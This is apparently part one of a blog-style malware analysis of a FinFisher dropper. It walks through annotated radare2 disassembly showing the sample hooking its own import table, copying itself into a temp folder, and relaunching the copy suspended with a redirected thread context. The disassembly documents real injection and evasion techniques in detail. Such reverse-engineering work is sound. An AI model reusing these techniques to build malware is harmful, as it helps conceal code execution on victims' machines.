
First lookup to FinFisher binary

In this short writeup I will take a look at the finfisher1.exe.bin dropper with the help of radare2. It covers only how the sample re-launches itself as a new process and everything directly related to that; the more interesting parts are left for later articles. Part 2 Part 3 Part 4

Filename sha256
finfisher.1.bin.exe f827c92fbe832db3f09f47fe0dcaafd89b40c7064ab90833a1f418f2d1e75e8e
  • As the file contains no real protection or obfuscation, I will move through it quickly. The most interesting function in this binary is located at 0x00402369. It walks the binary's own import directory looking for 'user32.dll' and, inside that DLL's thunk list, for RegisterClassExW and CreateWindowExW. It then makes each IAT slot writable with VirtualProtect and replaces the address of RegisterClassExW with 0x004019ef and that of CreateWindowExW with 0x00402228. In other words the dropper hooks its own import table, so the ordinary-looking GUI initialization code ends up executing the payload.
; ===========================================================================
; fcn.00402369 - hook the dropper's OWN import table (IAT patching).
; Walks the import directory of the running image, finds the user32.dll
; descriptor and rewrites two IAT slots:
;   RegisterClassExW -> fcn.004019ef     CreateWindowExW -> fcn.00402228
; Afterwards the program's normal GUI start-up code (calls at 0x401638 and
; 0x4014b3) runs the payload instead of user32.
; Register roles: esi = image base (copy kept at [ebp-8]); ebx = current
; IMAGE_IMPORT_DESCRIPTOR; inner loop: edi = INT (name thunk) cursor,
; esi = IAT cursor; [ebp-4] = old page protection from VirtualProtect.
; No arguments; eax on return is just whatever the last instruction left.
; Offsets (0x3c, 0x80, 0xc, 0x10, 0x14, +2) follow the PE32 / import
; descriptor / IMAGE_IMPORT_BY_NAME layouts.
; ===========================================================================
0x00402369    8bff         mov edi, edi                ; 2-byte no-op, MSVC hot-patch padding
0x0040236b    55           push ebp
0x0040236c    8bec         mov ebp, esp
0x0040236e    51           push ecx                    ; reserve [ebp-4] (old protection)
0x0040236f    51           push ecx                    ; reserve [ebp-8] (image base)
0x00402370    53           push ebx
0x00402371    56           push esi
0x00402372    6a00         push 0x0                    ; hModule = NULL -> the running executable
0x00402374    ff1514104000 call dword [reloc.KERNEL32.dll_GetModuleHandleW]
0x0040237a    8bf0         mov esi, eax                ; esi = image base
0x0040237c    8b463c       mov eax, [esi+0x3c]         ; e_lfanew: RVA of IMAGE_NT_HEADERS
0x0040237f    8b9c3080000. mov ebx, [eax+esi+0x80]     ; NT headers + 0x80 = DataDirectory[IMPORT].VirtualAddress (PE32)
0x00402386    03de         add ebx, esi                ; ebx = first IMAGE_IMPORT_DESCRIPTOR (VA)
0x00402388    8b430c       mov eax, [ebx+0xc]          ; descriptor.Name (RVA of the DLL name)
0x0040238b    85c0         test eax, eax
0x0040238d    8975f8       mov [ebp-0x8], esi          ; stash image base; esi is reused as IAT cursor below
0x00402390    0f84c8000000 je 0x40245e                 ; no imports -> leave (edi not pushed yet, so skip pop edi)
0x00402396    57           push edi
; --- outer loop: one IMAGE_IMPORT_DESCRIPTOR per iteration (re-entered at 0x402397) ---
0x00402397    03c6         add eax, esi                ; eax = DLL name string (VA)
0x00402399    6828134000   push 0x401328 ; 0x00401328   ; "user32.dll"
0x0040239e    50           push eax
0x0040239f    ff1548114000 call dword [reloc.msvcrt.dll__stricmp]   ; case-insensitive compare
0x004023a5    85c0         test eax, eax
0x004023a7    59           pop ecx                     ; cdecl cleanup, 2 args
0x004023a8    59           pop ecx
0x004023a9    0f85a0000000 jne 0x40244f                ; not user32 -> next descriptor
0x004023af    8b3b         mov edi, [ebx]              ; OriginalFirstThunk (INT: RVAs of IMAGE_IMPORT_BY_NAME)
0x004023b1    03fe         add edi, esi                ; edi = INT cursor (VA)
0x004023b3    8b7310       mov esi, [ebx+0x10]         ; FirstThunk (IAT: resolved function addresses)
0x004023b6    0375f8       add esi, [ebp-0x8]          ; esi = IAT cursor (VA), walked in lockstep with edi
0x004023b9    e984000000   jmp 0x402442                ; enter the thunk loop at its termination test
; --- inner loop: one INT/IAT pair per iteration ---
0x004023be    8b4df8       mov ecx, [ebp-0x8]          ; ecx = image base
0x004023c1    8d440802     lea eax, [eax+ecx+0x2]      ; IMAGE_IMPORT_BY_NAME.Name (skip the 2-byte Hint)
                                                       ; NOTE: no IMAGE_ORDINAL_FLAG check - an import by ordinal
                                                       ; would be treated as an RVA; tolerable only because this
                                                       ; is the sample's own, known, import table
0x004023c5    6814134000   push 0x401314 ; 0x00401314   ; "RegisterClassExW"
0x004023ca    50           push eax
0x004023cb    ff1548114000 call dword [reloc.msvcrt.dll__stricmp]
0x004023d1    85c0         test eax, eax
0x004023d3    59           pop ecx
0x004023d4    59           pop ecx
0x004023d5    7525         jne 0x4023fc                ; not RegisterClassExW -> try the other name
0x004023d7    8d45fc       lea eax, [ebp-0x4]
0x004023da    50           push eax                    ; lpflOldProtect = &[ebp-4]
0x004023db    6a40         push 0x40                   ; PAGE_EXECUTE_READWRITE (RW would suffice; RWX on the
                                                       ; IAT page is a cheap detection signal)
0x004023dd    6a04         push 0x4                    ; dwSize = one IAT slot
0x004023df    56           push esi                    ; lpAddress = the IAT slot
0x004023e0    ff1544104000 call dword [reloc.KERNEL32.dll_VirtualProtect]   ; return value not checked
0x004023e6    8d45fc       lea eax, [ebp-0x4]
0x004023e9    50           push eax                    ; lpflOldProtect again (scratch)
0x004023ea    c706ef194000 mov dword [esi], fcn.004019ef  ; *** overwrite IAT slot: RegisterClassExW -> fcn.004019ef ***
0x004023f0    ff75fc       push dword [ebp-0x4]        ; flNewProtect = the saved old protection
0x004023f3    6a04         push 0x4
0x004023f5    56           push esi
0x004023f6    ff1544104000 call dword [reloc.KERNEL32.dll_VirtualProtect]   ; restore protection
0x004023fc    8b07         mov eax, [edi]              ; reload the same INT entry; both names are tested per entry
0x004023fe    8b4df8       mov ecx, [ebp-0x8]
0x00402401    8d440802     lea eax, [eax+ecx+0x2]      ; IMAGE_IMPORT_BY_NAME.Name
0x00402405    6804134000   push 0x401304 ; 0x00401304   ; "CreateWindowExW"
0x0040240a    50           push eax
0x0040240b    ff1548114000 call dword [reloc.msvcrt.dll__stricmp]
0x00402411    85c0         test eax, eax
0x00402413    59           pop ecx
0x00402414    59           pop ecx
0x00402415    7525         jne 0x40243c                ; no match -> advance cursors
0x00402417    8d45fc       lea eax, [ebp-0x4]
0x0040241a    50           push eax
0x0040241b    6a40         push 0x40                   ; PAGE_EXECUTE_READWRITE
0x0040241d    6a04         push 0x4
0x0040241f    56           push esi
0x00402420    ff1544104000 call dword [reloc.KERNEL32.dll_VirtualProtect]
0x00402426    8d45fc       lea eax, [ebp-0x4]
0x00402429    50           push eax
0x0040242a    c70628224000 mov dword [esi], fcn.00402228  ; *** overwrite IAT slot: CreateWindowExW -> fcn.00402228 ***
0x00402430    ff75fc       push dword [ebp-0x4]
0x00402433    6a04         push 0x4
0x00402435    56           push esi
0x00402436    ff1544104000 call dword [reloc.KERNEL32.dll_VirtualProtect]   ; restore protection
0x0040243c    83c704       add edi, 0x4                ; next INT entry (PE32: 4-byte thunks)
0x0040243f    83c604       add esi, 0x4                ; next IAT entry
0x00402442    8b07         mov eax, [edi]              ; loop test: INT entry 0 terminates the thunk list
0x00402444    85c0         test eax, eax
0x00402446    0f8572ffffff jne 0x4023be
0x0040244c    8b75f8       mov esi, [ebp-0x8]          ; esi = image base again for the outer loop
0x0040244f    8b4320       mov eax, [ebx+0x20]         ; Name of the NEXT descriptor (0x14 + 0xc) ...
0x00402452    83c314       add ebx, 0x14               ; ... then advance (sizeof IMAGE_IMPORT_DESCRIPTOR)
0x00402455    85c0         test eax, eax
0x00402457    0f853affffff jne 0x402397                ; Name == 0 is the end-of-table sentinel
0x0040245d    5f           pop edi
0x0040245e    5e           pop esi                     ; target of the early exit at 0x402390
0x0040245f    5b           pop ebx
0x00402460    c9           leave
0x00402461    c3           ret
  • The RegisterClassExW function is called at 0x00401638.
0x00401638    ff1500114000 call dword [reloc.USER32.dll_RegisterClassExW] ;[2]  ; indirect call through the IAT slot that fcn.00402369 rewrote -> lands in fcn.004019ef, not user32
  • This function creates a new folder inside the directory returned by GetTempPathW (normally C:\Users\<Username>\AppData\Local\Temp) named TMP<8 hex digits>, where the digits are derived from rdtsc (rdtsc returns the timestamp counter in edx:eax; the two halves are simply OR'ed together). Finally it copies the running binary (whose path it obtains with GetModuleFileNameW) into the newly created folder, keeping the original file name. The function never looks at its WNDCLASSEXW argument and returns 1, so the caller believes the class registration succeeded.
; ===========================================================================
; fcn.004019ef - replacement for RegisterClassExW, reached through the
; patched IAT slot (see the call at 0x401638).
; NOTE: the listing starts at 0x4019f1; the first two bytes at 0x4019ef
; (presumably the `mov edi,edi` hot-patch pad) are not shown here.
; Effect: creates %TEMP%\TMP<8 hex digits> (digits from rdtsc) and copies
; the running executable into it under its original file name.
; The WNDCLASSEXW* argument is never read; returns 1 (non-zero = "success"
; to the caller). `ret 4` matches stdcall with one pointer argument.
; Globals written: 0x4048a0 = full path of this executable (WCHAR[0x104])
;                  0x404680 = full path of the copy
;                  both are read again by fcn.00402228.
; Locals: [ebp-0x61c] temp dir, [ebp-0x414] "TMP<hex>", [ebp-0x20c]
;         "<temp>\TMP<hex>" (each 0x208 bytes), [ebp-4] stack cookie.
; ===========================================================================
0x004019f1    55           push ebp
0x004019f2    8bec         mov ebp, esp
0x004019f4    81ec1c060000 sub esp, 0x61c              ; 3 * 0x208 bytes of WCHAR buffers + 4 for the cookie
0x004019fa    a100404000   mov eax, []                 ; bytes a1 00 40 40 00 = mov eax,[0x404000]; looks like the MSVC /GS cookie - r2 rendered the operand empty
0x004019ff    33c5         xor eax, ebp
0x00401a01    8945fc       mov [ebp-0x4], eax          ; cookie ^ ebp, checked again before return
0x00401a04    53           push ebx
0x00401a05    56           push esi
0x00401a06    57           push edi
0x00401a07    be04010000   mov esi, 0x104 ; 0x00000104  ; MAX_PATH, buffer size (in WCHARs) for every call below
0x00401a0c    56           push esi                    ; nSize
0x00401a0d    68a0484000   push 0x4048a0 ; 0x004048a0   ; lpFilename = global buffer
0x00401a12    6a00         push 0x0
0x00401a14    ff1514104000 call dword [reloc.KERNEL32.dll_GetModuleHandleW]  ; NULL -> base of the running executable (a module handle, not a process handle)
0x00401a1a    50           push eax
0x00401a1b    ff1510104000 call dword [reloc.KERNEL32.dll_GetModuleFileNameW]  ; 0x4048a0 = full path of this exe
0x00401a21    8bf8         mov edi, eax                ; edi = path length in WCHARs (terminator excluded)
0x00401a23    8d85e4f9ffff lea eax, [ebp-0x61c]
0x00401a29    50           push eax                    ; lpBuffer
0x00401a2a    56           push esi                    ; nBufferLength = MAX_PATH
0x00401a2b    ff150c104000 call dword [reloc.KERNEL32.dll_GetTempPathW]  ; [ebp-0x61c] = %TEMP% (with trailing backslash)
0x00401a31    8d3c7da0484. lea edi, [edi*2+0x4048a0]   ; edi = &path[len], i.e. the terminating NUL WCHAR
0x00401a38    eb02         jmp 0x401a3c                ; enter the scan at the compare
0x00401a3a    4f           dec edi
0x00401a3b    4f           dec edi                     ; step back one WCHAR
0x00401a3c    66833f5c     cmp word [edi], 0x5c        ; '\\' - scanning BACKWARDS, so this finds the LAST backslash
0x00401a40    75f8         jne fcn.00401a3a            ; no lower bound: relies on GetModuleFileNameW having produced a path with a separator
0x00401a42    0f31         rdtsc                       ; timestamp counter -> edx:eax
0x00401a44    0bc2         or eax, edx                 ; eax = low32 | high32, the pseudo-random part of the dir name
0x00401a46    50           push eax
0x00401a47    68a8114000   push 0x4011a8 ; 0x004011a8   ; format string, shown by r2 as "TMP% 08X%" - presumably the wide string L"TMP%08X"
0x00401a4c    8d85ecfbffff lea eax, [ebp-0x414]        ; output: "TMP<8 hex digits>"
0x00401a52    56           push esi                    ; size
0x00401a53    50           push eax                    ; buffer
0x00401a54    e8f9feffff   call vsnwprintf_wrapper     ; (buf, 0x104, fmt, eax|edx) - cdecl, cleaned up at 0x401a7a
0x00401a59    8d85ecfbffff lea eax, [ebp-0x414]
0x00401a5f    50           push eax                    ; %s #2 = "TMP<hex>"
0x00401a60    8d85e4f9ffff lea eax, [ebp-0x61c]
0x00401a66    50           push eax                    ; %s #1 = temp dir
0x00401a67    bb9c114000   mov ebx, 0x40119c ; 0x0040119c   ; L"%s\%s", kept in ebx for reuse below
0x00401a6c    53           push ebx
0x00401a6d    8d85f4fdffff lea eax, [ebp-0x20c]        ; output: "<temp>\TMP<hex>"
0x00401a73    56           push esi
0x00401a74    50           push eax
0x00401a75    e8d8feffff   call vsnwprintf_wrapper
0x00401a7a    83c424       add esp, 0x24               ; 9 dwords: 4 args of the first call + 5 of the second
0x00401a7d    6a00         push 0x0                    ; lpSecurityAttributes = NULL
0x00401a7f    8d85f4fdffff lea eax, [ebp-0x20c]
0x00401a85    50           push eax
0x00401a86    ff1508104000 call dword [reloc.KERNEL32.dll_CreateDirectoryW]  ; mkdir %TEMP%\TMP<hex>; result ignored
0x00401a8c    83c702       add edi, 0x2                ; skip the backslash -> edi = original file name (basename)
0x00401a8f    57           push edi                    ; %s #2 = basename
0x00401a90    8d85f4fdffff lea eax, [ebp-0x20c]
0x00401a96    50           push eax                    ; %s #1 = new directory
0x00401a97    53           push ebx                    ; L"%s\%s"
0x00401a98    56           push esi                    ; size (esi still 0x104 here)
0x00401a99    be80464000   mov esi, 0x404680 ; 0x00404680   ; global buffer for the destination path
0x00401a9e    56           push esi
0x00401a9f    e8aefeffff   call vsnwprintf_wrapper     ; 0x404680 = "<temp>\TMP<hex>\<basename>"
0x00401aa4    83c414       add esp, 0x14               ; 5 dwords
0x00401aa7    6a00         push 0x0                    ; bFailIfExists = FALSE (overwrite)
0x00401aa9    56           push esi                    ; lpNewFileName = 0x404680
0x00401aaa    68a0484000   push 0x4048a0 ; 0x004048a0   ; lpExistingFileName = this executable
0x00401aaf    ff1504104000 call dword [reloc.KERNEL32.dll_CopyFileW]  ; drop a copy of itself; result ignored
0x00401ab5    8b4dfc       mov ecx, [ebp-0x4]          ; cookie check: ecx = stored cookie ^ ebp
0x00401ab8    5f           pop edi
0x00401ab9    33c0         xor eax, eax
0x00401abb    5e           pop esi
0x00401abc    33cd         xor ecx, ebp
0x00401abe    40           inc eax                     ; return 1 - a non-zero "ATOM", so the caller thinks RegisterClassExW succeeded
0x00401abf    5b           pop ebx
0x00401ac0    e8030f0000   call fcn.004029c8           ; presumably __security_check_cookie(ecx)
0x00401ac5    c9           leave
0x00401ac6    c20400       ret 0x4                     ; stdcall, one argument (const WNDCLASSEXW*)
  • The call to CreateWindowExW (now redirected through the patched IAT slot to the hook at 0x00402228) is located at 0x004014b3.
0x004014b3    ff15f0104000 call dword [reloc.USER32.dll_CreateWindowExW] ;[1]  ; IAT slot rewritten by fcn.00402369 -> executes fcn.00402228, which never returns
  • This function starts the copy of the dropper with the CREATE_SUSPENDED flag, so the new process exists but its main thread has not yet run any code of the binary. GetThreadContext then retrieves the initial context of that thread. The function stores 0x401e1f at offset 0xb0 of the CONTEXT structure. On 32-bit Windows that field is Eax, not Eip (Eip is at offset 0xb8): for a freshly created suspended process the initial Eax holds the image entry point that the thread-start stub in ntdll calls into, so after SetThreadContext the new process effectively starts at 0x401e1f once it is resumed. Before the thread is resumed, the path of the current executable and a duplicated PROCESS_ALL_ACCESS handle to the current process are written into the new process with WriteProcessMemory, at the same virtual addresses they have in the parent. None of the API return values are checked. Our short journey ends at TerminateProcess, which kills the original dropper. In the next article I will write more about the new process that starts at 0x401e1f.
; ===========================================================================
; fcn.00402228 - replacement for CreateWindowExW, reached through the
; patched IAT slot (see the call at 0x4014b3).
; Effect: launches the copy at 0x404680 (made by fcn.004019ef) suspended,
; redirects its initial thread to 0x401e1f, hands it the parent's path and a
; PROCESS_ALL_ACCESS handle to the parent, resumes it and then terminates
; the current process.
; Locals: [ebp-0x328] STARTUPINFOW (0x44 bytes), [ebp-0x2e0] PROCESS_INFORMATION
;         (hProcess -0x2e0, hThread -0x2dc, pid -0x2d8, tid -0x2d4),
;         [ebp-0x2d0] CONTEXT, [ebp-0x2e4] handle to self, [ebp-4] cookie.
; Globals: 0x4048a0 = own path, 0x404680 = path of the copy,
;          0x404aa8 = duplicated handle value destined for the child.
; The 12 CreateWindowExW arguments are never read. Ends with a plain `ret`
; (no `ret 0x30`), which is only harmless because TerminateProcess does not
; return; should it fail, the caller's stack would be off by 0x30.
; ===========================================================================
0x00402228    8bff         mov edi, edi                ; hot-patch padding
0x0040222a    55           push ebp
0x0040222b    8bec         mov ebp, esp
0x0040222d    81ec28030000 sub esp, 0x328
0x00402233    a100404000   mov eax, []                 ; bytes a1 00 40 40 00 = mov eax,[0x404000]; looks like the /GS security cookie
0x00402238    33c5         xor eax, ebp
0x0040223a    8945fc       mov [ebp-0x4], eax          ; cookie ^ ebp
0x0040223d    53           push ebx
0x0040223e    56           push esi
0x0040223f    57           push edi
0x00402240    33c0         xor eax, eax
0x00402242    8dbd20fdffff lea edi, [ebp-0x2e0]        ; PROCESS_INFORMATION
0x00402248    ab           stosd                       ; zero its 16 bytes (4 x stosd)
0x00402249    ab           stosd
0x0040224a    ab           stosd
0x0040224b    6a44         push 0x44                   ; memset size = sizeof(STARTUPINFOW)
0x0040224d    ab           stosd
0x0040224e    33f6         xor esi, esi                ; esi = 0, pushed as NULL/FALSE below
0x00402250    8d85d8fcffff lea eax, [ebp-0x328]        ; STARTUPINFOW
0x00402256    56           push esi                    ; value 0
0x00402257    50           push eax
0x00402258    e87f070000   call sub.msvcrt.dll_memset_9dc   ; memset(&si, 0, 0x44); no store of si.cb = 0x44 is visible afterwards
0x0040225d    83c40c       add esp, 0xc
0x00402260    8d8520fdffff lea eax, [ebp-0x2e0]
0x00402266    50           push eax                    ; lpProcessInformation
0x00402267    8d85d8fcffff lea eax, [ebp-0x328]
0x0040226d    50           push eax                    ; lpStartupInfo
0x0040226e    56           push esi                    ; lpCurrentDirectory = NULL
0x0040226f    56           push esi                    ; lpEnvironment = NULL
0x00402270    6a04         push 0x4                    ; dwCreationFlags = CREATE_SUSPENDED
0x00402272    56           push esi                    ; bInheritHandles = FALSE
0x00402273    56           push esi                    ; lpThreadAttributes = NULL
0x00402274    56           push esi                    ; lpProcessAttributes = NULL
0x00402275    56           push esi                    ; lpCommandLine = NULL
0x00402276    6880464000   push 0x404680 ; 0x00404680   ; lpApplicationName = the copy in %TEMP%\TMP<hex>\
0x0040227b    ff1540104000 call dword [reloc.KERNEL32.dll_CreateProcessW]  ; return value NOT checked: on failure every call below runs on NULL handles
0x00402281    8d8530fdffff lea eax, [ebp-0x2d0]        ; CONTEXT
0x00402287    50           push eax
0x00402288    ffb524fdffff push dword [ebp-0x2dc]      ; pi.hThread
0x0040228e    c78530fdfff. mov dword [ebp-0x2d0], 0x10007   ; ContextFlags = CONTEXT_FULL (i386|CONTROL|INTEGER|SEGMENTS)
0x00402298    ff1574104000 call dword [reloc.KERNEL32.dll_GetThreadContext]
0x0040229e    8d8530fdffff lea eax, [ebp-0x2d0]
0x004022a4    50           push eax
0x004022a5    ffb524fdffff push dword [ebp-0x2dc]      ; pi.hThread
0x004022ab    c785e0fdfff. mov dword [ebp-0x220], fcn.00401e1f  ; CONTEXT+0xb0 = Eax (NOT Eip, which is at +0xb8). For a new suspended
                                                       ; x86 process Eax carries the entry point that ntdll's thread-start stub
                                                       ; calls, so this redirects the child to 0x401e1f (process-hollowing style)
0x004022b5    ff1570104000 call dword [reloc.KERNEL32.dll_SetThreadContext]
0x004022bb    8b1d6c104000 mov ebx, [reloc.KERNEL32.dll_WriteProcessMemory]   ; ebx = WriteProcessMemory, called twice
0x004022c1    56           push esi                    ; lpNumberOfBytesWritten = NULL
0x004022c2    6808020000   push 0x208 ; 0x00000208     ; nSize = 0x104 WCHARs
0x004022c7    b8a0484000   mov eax, 0x4048a0 ; 0x004048a0   ; own full path (filled by fcn.004019ef)
0x004022cc    50           push eax                    ; lpBuffer (source, in this process)
0x004022cd    50           push eax                    ; lpBaseAddress (same VA in the child - assumes the copy maps at the same base)
0x004022ce    ffb520fdffff push dword [ebp-0x2e0]      ; pi.hProcess
0x004022d4    ffd3         call ebx                    ; WriteProcessMemory: parent path -> child @ 0x4048a0
0x004022d6    ff153c104000 call dword [reloc.KERNEL32.dll_GetCurrentProcessId]
0x004022dc    50           push eax                    ; dwProcessId = own PID
0x004022dd    56           push esi                    ; bInheritHandle = FALSE
0x004022de    68ff0f1f00   push 0x1f0fff ; 0x001f0fff   ; PROCESS_ALL_ACCESS
0x004022e3    ff1538104000 call dword [reloc.KERNEL32.dll_OpenProcess]   ; full-access handle to ourselves
0x004022e9    6a02         push 0x2                    ; dwOptions = DUPLICATE_SAME_ACCESS
0x004022eb    56           push esi                    ; bInheritHandle = FALSE
0x004022ec    56           push esi                    ; dwDesiredAccess = 0 (ignored with SAME_ACCESS)
0x004022ed    bfa84a4000   mov edi, 0x404aa8 ; 0x00404aa8
0x004022f2    57           push edi                    ; lpTargetHandle = 0x404aa8 (a global in THIS process)
0x004022f3    ffb520fdffff push dword [ebp-0x2e0]      ; hTargetProcessHandle = pi.hProcess
0x004022f9    89851cfdffff mov [ebp-0x2e4], eax        ; keep the self handle for CloseHandle
0x004022ff    50           push eax                    ; hSourceHandle = self handle
0x00402300    ff1534104000 call dword [reloc.KERNEL32.dll_GetCurrentProcess]
0x00402306    50           push eax                    ; hSourceProcessHandle = pseudo handle to self
0x00402307    ff1530104000 call dword [reloc.KERNEL32.dll_DuplicateHandle]   ; 0x404aa8 = handle value valid in the child
0x0040230d    56           push esi                    ; lpNumberOfBytesWritten = NULL
0x0040230e    6a04         push 0x4                    ; nSize = one HANDLE
0x00402310    57           push edi                    ; lpBuffer = 0x404aa8
0x00402311    57           push edi                    ; lpBaseAddress = 0x404aa8 in the child
0x00402312    ffb520fdffff push dword [ebp-0x2e0]      ; pi.hProcess
0x00402318    ffd3         call ebx                    ; WriteProcessMemory: child now holds a PROCESS_ALL_ACCESS handle to its parent (use is in the child's code, not shown)
0x0040231a    ffb524fdffff push dword [ebp-0x2dc]      ; pi.hThread
0x00402320    ff151c104000 call dword [reloc.KERNEL32.dll_ResumeThread]  ; child starts at 0x401e1f
0x00402326    ffb51cfdffff push dword [ebp-0x2e4]      ; self handle from OpenProcess
0x0040232c    8b3d18104000 mov edi, [reloc.KERNEL32.dll_CloseHandle]
0x00402332    ffd7         call edi                    ; CloseHandle(self)
0x00402334    ffb520fdffff push dword [ebp-0x2e0]
0x0040233a    ffd7         call edi                    ; CloseHandle(pi.hProcess)
0x0040233c    ffb524fdffff push dword [ebp-0x2dc]
0x00402342    ffd7         call edi                    ; CloseHandle(pi.hThread)
0x00402344    56           push esi                    ; uExitCode = 0
0x00402345    ff1534104000 call dword [reloc.KERNEL32.dll_GetCurrentProcess]
0x0040234b    50           push eax
0x0040234c    ff1520104000 call dword [reloc.KERNEL32.dll_TerminateProcess]   ; kill the original dropper; normally does not return
0x00402352    8b4dfc       mov ecx, [ebp-0x4]          ; --- only reached if TerminateProcess failed ---
0x00402355    5f           pop edi
0x00402356    33c0         xor eax, eax
0x00402358    5e           pop esi
0x00402359    33cd         xor ecx, ebp
0x0040235b    40           inc eax                     ; return 1
0x0040235c    5b           pop ebx
0x0040235d    e866060000   call fcn.004029c8           ; presumably __security_check_cookie(ecx)
0x00402362    c9           leave
0x00402363    c3           ret                         ; plain ret: does not clean up the 12 stdcall args of CreateWindowExW